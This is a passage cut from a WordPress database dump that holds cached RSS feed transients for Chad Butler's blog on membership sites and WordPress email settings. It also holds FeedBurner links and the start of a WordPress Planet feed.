src=\"http://feeds.feedburner.com/~ff/butlerblog?i=LKX4GwZQzyE:mtZt7OT42PU:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=LKX4GwZQzyE:mtZt7OT42PU:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=LKX4GwZQzyE:mtZt7OT42PU:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=LKX4GwZQzyE:mtZt7OT42PU:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=LKX4GwZQzyE:mtZt7OT42PU:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=LKX4GwZQzyE:mtZt7OT42PU:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=LKX4GwZQzyE:mtZt7OT42PU:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=LKX4GwZQzyE:mtZt7OT42PU:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/LKX4GwZQzyE\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:101:\"http://www.butlerblog.com/2015/02/02/5-top-bloggers-teach-you-how-to-drive-traffic-to-your-blog/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"http://www.butlerblog.com/2015/02/02/5-top-bloggers-teach-you-how-to-drive-traffic-to-your-blog/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:63:\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"Building Successful Membership Sites: What You Need To Know\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/Kxe5VDIbYxg/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://www.butlerblog.com/2015/01/30/how-to-build-successful-membership-sites/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 30 Jan 2015 15:54:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:10:{i:0;a:5:{s:4:\"data\";s:13:\"Blogging Tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"blogging\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:14:\"Building Trust\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:8:\"Business\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:17:\"Business Modeling\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:17:\"content-marketing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:16:\"membership-sites\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:8:\"monetize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:8;a:5:{s:4:\"data\";s:15:\"Premium Content\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:9;a:5:{s:4:\"data\";s:16:\"Web Entrepreneur\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:39:\"http://www.butlerblog.com/?page_id=3302\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1774:\"Many web entrepreneurs and freelancers would argue that the membership site is the ultimate business model. As someone who has utilized this concept for coming close to two decades, I would agree. I...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=Kxe5VDIbYxg:fzdF2-4qX-w:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=Kxe5VDIbYxg:fzdF2-4qX-w:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=Kxe5VDIbYxg:fzdF2-4qX-w:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=Kxe5VDIbYxg:fzdF2-4qX-w:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=Kxe5VDIbYxg:fzdF2-4qX-w:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=Kxe5VDIbYxg:fzdF2-4qX-w:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=Kxe5VDIbYxg:fzdF2-4qX-w:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=Kxe5VDIbYxg:fzdF2-4qX-w:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=Kxe5VDIbYxg:fzdF2-4qX-w:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=Kxe5VDIbYxg:fzdF2-4qX-w:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/Kxe5VDIbYxg\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://www.butlerblog.com/2015/01/30/how-to-build-successful-membership-sites/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://www.butlerblog.com/2015/01/30/how-to-build-successful-membership-sites/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:48:\"\n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"Change WordPress email settings to reduce spam rejection\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/UXBYB7kQsxM/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:103:\"http://www.butlerblog.com/2014/11/24/change-wordpress-email-settings-to-reduce-spam-rejection/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 24 Nov 2014 16:41:57 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:5:{i:0;a:5:{s:4:\"data\";s:13:\"Blogging Tips\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:9:\"WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:6:\"webdev\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:29:\"Wordpress Email Configuration\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:7:\"wp_mail\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://www.butlerblog.com/?p=3263\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1774:\"I have several other posts on how to improve the reliability of email sent via wp_mail and how to troubleshoot your WordPress email settings, most of which has focused on the sending end. A common...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=UXBYB7kQsxM:4_c9_4U2EAY:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=UXBYB7kQsxM:4_c9_4U2EAY:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=UXBYB7kQsxM:4_c9_4U2EAY:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=UXBYB7kQsxM:4_c9_4U2EAY:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=UXBYB7kQsxM:4_c9_4U2EAY:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=UXBYB7kQsxM:4_c9_4U2EAY:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=UXBYB7kQsxM:4_c9_4U2EAY:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=UXBYB7kQsxM:4_c9_4U2EAY:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=UXBYB7kQsxM:4_c9_4U2EAY:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=UXBYB7kQsxM:4_c9_4U2EAY:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/UXBYB7kQsxM\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"http://www.butlerblog.com/2014/11/24/change-wordpress-email-settings-to-reduce-spam-rejection/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://www.butlerblog.com/2014/11/24/change-wordpress-email-settings-to-reduce-spam-rejection/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:36:\"\n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"Weekend Reading List\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://feedproxy.google.com/~r/butlerblog/~3/7lanse57Iro/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"http://www.butlerblog.com/2014/10/25/weekend-reading-list-3/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 25 Oct 2014 15:00:54 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Editorial\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://www.butlerblog.com/?p=3241\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1772:\"One of these weeks, I’m going to get the Weekend Reading List out on a Friday like it’s supposed to be! But at least this is closer (Saturday morning). I’ve got a great list of...<br/>\n<br/>\n[[ This is a content summary only. Visit my website for full links, other content, and more! ]]<div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=7lanse57Iro:ra3rzd2c9vI:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=7lanse57Iro:ra3rzd2c9vI:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=7lanse57Iro:ra3rzd2c9vI:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=7lanse57Iro:ra3rzd2c9vI:dnMXMwOfBR0\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=dnMXMwOfBR0\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=7lanse57Iro:ra3rzd2c9vI:F7zBnMyn0Lo\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=7lanse57Iro:ra3rzd2c9vI:F7zBnMyn0Lo\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=7lanse57Iro:ra3rzd2c9vI:7Q72WNTAKBA\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=7Q72WNTAKBA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=7lanse57Iro:ra3rzd2c9vI:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/butlerblog?a=7lanse57Iro:ra3rzd2c9vI:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/butlerblog?i=7lanse57Iro:ra3rzd2c9vI:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/butlerblog/~4/7lanse57Iro\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"http://www.butlerblog.com/2014/10/25/weekend-reading-list-3/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://www.butlerblog.com/2014/10/25/weekend-reading-list-3/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:2:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";s:4:\"href\";s:38:\"http://feeds.feedburner.com/butlerblog\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:3:\"rel\";s:3:\"hub\";s:4:\"href\";s:32:\"http://pubsubhubbub.appspot.com/\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:3:{s:4:\"info\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:3:\"uri\";s:10:\"butlerblog\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:14:\"emailServiceId\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"butlerblog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:18:\"feedburnerHostname\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://feedburner.google.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"etag\";s:27:\"l80XHPeep6JVACV0XkOko9FDeaI\";s:13:\"last-modified\";s:29:\"Wed, 11 May 2016 19:07:49 GMT\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"date\";s:29:\"Wed, 11 May 2016 19:55:01 GMT\";s:7:\"expires\";s:29:\"Wed, 11 May 2016 19:55:01 GMT\";s:13:\"cache-control\";s:18:\"private, max-age=0\";s:22:\"x-content-type-options\";s:7:\"nosniff\";s:16:\"x-xss-protection\";s:13:\"1; mode=block\";s:6:\"server\";s:3:\"GSE\";}s:5:\"build\";s:14:\"20130911090210\";}','no'),(25380,'_transient_timeout_feed_mod_2c2fe0099a2578688413800ea68677d6','1463039701','no'),(25383,'_transient_feed_mod_2c2fe0099a2578688413800ea68677d6','1462996501','no'),(25385,'_transient_timeout_feed_ac0b00fe65abe10e0c5b588f3ed8c7ca','1463039706','no'),(25388,'_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1463039706','no'),(25391,'_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1462996506','no'),(25394,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1463039707','no'),(25397,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - 